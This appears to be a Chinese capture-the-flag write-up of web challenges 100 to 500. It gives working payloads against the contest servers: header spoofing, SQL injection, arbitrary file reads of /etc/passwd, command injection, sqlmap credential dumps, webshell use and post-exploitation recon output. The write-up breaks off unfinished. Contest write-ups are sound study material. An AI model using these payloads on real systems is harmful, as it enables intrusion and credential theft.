web
web100:flag之路
Step 1:http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!
Step 2:FireFox插件将Request Header中X-Forwarded-For字段设为127.0.0.1
Here is your flag: ACTF{I_love_H4ck_and_I_love_F4ck}
web200:讨厌的管理员
http://218.2.197.236:2005/web200/index.php表单登录页面,题目说flag在管理员手上
POST数据:name=admin%27+or+1%3D1+or+%27&pass=admin
提示:flag is in ae6032eeeb5cedc1555940983435335b.php,访问页面说,key not here
response header中realkeyisin: beda47ac34562108ee149767c61cb0ec.php,访问这个页面说admin才能看到
感觉是要提交什么数据标识自己是admin,请求时带上Cookie: admin=1
flag:ACTF{I_donot_need_sex_life_fxxks_me_everyday}
web300:喵喵喵喵
http://218.2.197.236:2001/login.php
I love you.And you?Then hack me please.
http://218.2.197.236:2001/主页上,
About This Blog
This doubi web blog layout is provided by ./bc
http://218.2.197.236:2001/bc/
http://218.2.197.236:2001/download/doWnlOad.php?uuu=./doWnlOad.php 任意文件读取
$url=$_GET['uuu'];
$url=str_replace("..","",$url);
$file = fopen("$url", "r") or exit("Unable to open file!");
//Output a line of the file until the end is reached
while(!feof($file)) {
echo fgets($file)."
";
}
fclose($file);
?>
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/etc/passwd
HINT:x:500:500::/usr/share/ngInx/html:/bin/bash
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/html
想起来那个很挑逗的,让你hack她的login.php页面,读一下她
header("Content-type:text/html; charset=GB2312");
$uid=$_GET["gongwan"];
if($fd=popen("/heiheihei/bin/online_user -f ".$uid, "r"))#看这里嘿嘿嘿,存在命令执行漏洞
{
$content=fread($fd, 1024);
fclose($fd);
}
$array=explode("\t",$content);
if($array[3]==0)
{
exit("I love you.And you?Then hack me please.");
}
if($_SERVER["REMOTE_ADDR"] != $array[3])
{
exit();
}
?>
http://218.2.197.236:2001/login.php?gongwan=22222%20||%20ls%20%3E./tesst.txt
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/html/tesst.txt
1
HiCode.cn.url
appleu0.txt
baka.mp3
bc
c0nfIg.php
contentslider.css
contentslider.js
dbiNf0.php
download
images
index.html
index.php
login.php
sb.txt
templatemo_style.css
tesst.txt
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/html/dbiNf0.php
$salt = "abchefghjkmnpqrstuvwxyz0123456789"; //Salt hash to help secure your passwords, it's recommended that you change this to something unique and long
$captcha_salt = "abchefghjkmnpqrstuvwxyz123456789"; //create a new CAPTCHA Salt for this session
$dbhost = "localhost";
$dbname = "FLAG"; // mysql database name
$dbuser = "FLAG"; // mysql database username
$dbpass = "ACTF{300deeaSyFlAGmemeDa}"; // mysql database password
$pre = "onecms_"; // prefix for onecms tables
?>
web400:贡碗酱
于是继续翻找
http://218.2.197.236:2001/login.php?gongwan=22222 || ls -la /usr/share/ngInx>./tesst.txt
total 16
drwxr-xr-x. 4 root root 4096 Apr 4 21:30 .
drwxr-xr-x. 125 root root 4096 Apr 4 21:03 ..
dr-xr-xr-x 2 root root 4096 Apr 4 21:24 NOTE
drwxr-xrwx. 5 root root 4096 Apr 11 20:10 html
http://218.2.197.236:2001/download/doWnlOad.php?uuu=/usr/share/ngInx/NOTE/note
今天加上了心仪的妹子的qq,实在太开心了!
2018.3.22
aay给了我旁边机器的一个低权限用户。我实在不擅长linux啊,但是他的一个页面好像有漏洞,好像是hejUbiAn.php。
2018.3.23
我用这个漏洞给数据库里写了些数据,正好把我传上去的一句话木马地址藏进去,嘿嘿嘿。
2018.3.25
在那个数据库里记一下那个一句话木马的密码吧,免得忘了,不过直接存密码不太安全呀~那我只存那个妹子的qq,密码是这妹子名字的小写拼音,这样我这个日记泄露了也不会有人能登陆,嘿嘿嘿。
2018.3.26
旁边机器的管理员aay总是不给我root权限,也从不请我们吃饭,早看他不顺眼了。我给他服务器做了个alias关联来欺骗他的root密码,大概不用几天就能成功了吧。
2018.4.1
http://218.2.197.236:2003/hejUbiAn.php
页面上的Z3c=解密结果gw,密码错误时,提示你不是gongwan
想到可以base64编码注入点
./sqlmap.py -u "http://218.2.197.236:2003/hejUbiAn.php" --data "password=gongwan" --tamper "base64encode.py" --dbs
./sqlmap.py -u "http://218.2.197.236:2003/hejUbiAn.php" --data "password=gongwan" --tamper "base64encode.py" -D "raw_admin" --dump
Database: raw_admin
Table: admin
+--------------------+-----------------+
| login | password |
+--------------------+-----------------+
| gw | gongwandaiskkkk |
| Fuckingluyuhao.php | 906239288 |
| luyuhaoxiaodaibi | luyuhaodadaibi |
+--------------------+-----------------+
qq号,百度账号,似乎都没有名字。
qq微博搜搜
http://t.qq.com/wangbiyun3709
真的是你家暗恋的妹纸?
客户端连到一句话木马之后,在/var/tmp/TheFlagIsHere.txt找到flag
ro0T:F1aG:{YaNg_zi_j1angDa1skdaiyouKukuku} Is Ok
这flag这么明显不知道是不是题被改过了,现在平台也没开放了
web500:丧心病狂的黑客
web300:218.2.197.236:2001
web400:218.2.197.236:2003
[/var/www/html/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:1F:58:C6
inet addr:172.17.3.2 Bcast:172.17.3.3 Mask:255.255.255.252
inet6 addr: fe80::20c:29ff:fe1f:58c6/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1643665 errors:0 dropped:0 overruns:0 frame:0
TX packets:1655915 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:230218730 (219.5 MiB) TX bytes:950011384 (906.0 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:348 errors:0 dropped:0 overruns:0 frame:0
TX packets:348 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:35642 (34.8 KiB) TX bytes:35642 (34.8 KiB)
[/var/www/html/]$ uname -a
Linux gamebox 2.6.32-431.11.2.el6.centos.plus.x86_64 #1 SMP Tue Mar 25 21:36:54 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
[/var/log/]$ arp -a
zhutou-centos-3-gw (172.17.3.1) at 00:0c:29:03:c2:e2 [ether] on eth0
(未完待续)